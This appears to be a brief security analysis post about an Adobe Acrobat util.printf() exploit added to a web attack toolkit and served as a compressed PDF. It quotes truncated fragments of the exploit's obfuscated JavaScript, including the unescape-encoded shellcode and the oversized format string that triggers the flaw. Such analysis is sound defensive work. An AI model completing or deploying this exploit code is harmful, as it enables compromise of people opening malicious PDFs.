It appears that last night, an exploit for the Acrobat util.printf() vulnerability was added to a well known Web attack toolkit. The attack exists as a compressed PDF. Once decompressed, the exploit is encoded with a simple eval()+ concatenation block:
-- function main() { eval(unescape(""+"%"+"76%61%"+"72%20%7"+ .. this.closeDoc(true); } app.setTimeOut("main()", 5000); --
--- var sccs = unescape(""+"%"+"u03eb%u"+"eb59%ue805%uf"+"ff8%uffff%u4949%u4949%u494"+ ...); ... util.printf(unescape(""+"%"+"25%34%35%30%30%30%66"), nm); ---